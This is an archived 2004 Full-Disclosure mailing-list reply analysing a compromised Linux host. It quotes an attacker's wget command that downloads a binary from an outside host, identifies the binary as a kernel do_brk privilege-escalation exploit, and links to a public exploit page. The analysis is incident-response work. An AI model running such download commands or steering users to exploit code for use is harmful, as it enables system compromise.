Network Security: Detailed info on Re: [Full-Disclosure] Automated ssh scanning

Subject:	Re: [Full-Disclosure] Automated ssh scanning
Date:	Thu, 26 Aug 2004 18:59:03 -0500 (CDT)

Subject:

Re: [Full-Disclosure] Automated ssh scanning

Date:

Thu, 26 Aug 2004 18:59:03 -0500 (CDT)


Howdy Gary,

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yo All!

On Thu, 26 Aug 2004, Deigo Dude wrote:

Maybe running this test again, and this time ...


No need to run the test again.

- From the .history I duplicated this:

 wget www.bo2k-rulez.net/a

Then did this to see the strings in the binary:

 strings a | less

This string looked ineresting:

 Kernel seems not to be vulnerable

A google on that string yields the exloit:

 http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

A simple exploit for the well known do_brk bug in the Linux kernel...


Cool, I was incrrect in assuning this was a fully patched system and the
compromise likely being an application sploit it appears.


Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

<Prev in Thread]	Current Thread	[Next in Thread>
Re: [Full-Disclosure] Automated ssh scanning, (continued) Re: [Full-Disclosure] Automated ssh scanning, Henrik Persson RE: !SPAM! [Full-Disclosure] Automated ssh scanning, Yaakov Yehudi RE: !SPAM! [Full-Disclosure] Automated ssh scanning, Richard Verwayen Re: [Full-Disclosure] Automated ssh scanning, Frank Knobbe Re: [Full-Disclosure] Automated ssh scanning, Jan Luehr RE: [Full-Disclosure] Automated ssh scanning, Todd Towles RE: [Full-Disclosure] Automated ssh scanning, Todd Towles Re: [Full-Disclosure] Automated ssh scanning, Tremaine Re: [Full-Disclosure] Automated ssh scanning, Deigo Dude Re: [Full-Disclosure] Automated ssh scanning, Gary E. Miller Re: [Full-Disclosure] Automated ssh scanning, Ron DuFresne <= Re: [Full-Disclosure] Automated ssh scanning, VeNoMouS Re: [Full-Disclosure] Automated ssh scanning, Tremaine Re: [Full-Disclosure] Automated ssh scanning, Ng Pheng Siong [Full-Disclosure] Malware can silently open holes in SP2 Firewall, jklemenc RE: [Full-Disclosure] Automated ssh scanning, Todd Towles RE: [Full-Disclosure] Automated ssh scanning, Ron DuFresne Re: [Full-Disclosure] Automated ssh scanning, Deigo Dude Re: [Full-Disclosure] Automated ssh scanning, KF_lists Re: [Full-Disclosure] Automated ssh scanning, Richard Verwayen Re: [Full-Disclosure] Automated ssh scanning, Valdis . Kletnieks

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	Re: !SPAM! [Full-Disclosure] Automated ssh scanning, sec-focus
Next by Date:	Re: [Full-Disclosure] Automated ssh scanning, VeNoMouS
Previous by Thread:	Re: [Full-Disclosure] Automated ssh scanning, Gary E. Miller
Next by Thread:	Re: [Full-Disclosure] Automated ssh scanning, VeNoMouS
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

Re: !SPAM! [Full-Disclosure] Automated ssh scanning, sec-focus

Next by Date:

Re: [Full-Disclosure] Automated ssh scanning, VeNoMouS

Previous by Thread:

Re: [Full-Disclosure] Automated ssh scanning, Gary E. Miller

Next by Thread:

Re: [Full-Disclosure] Automated ssh scanning, VeNoMouS

Indexes:

[Date] [Thread] [Top] [All Lists]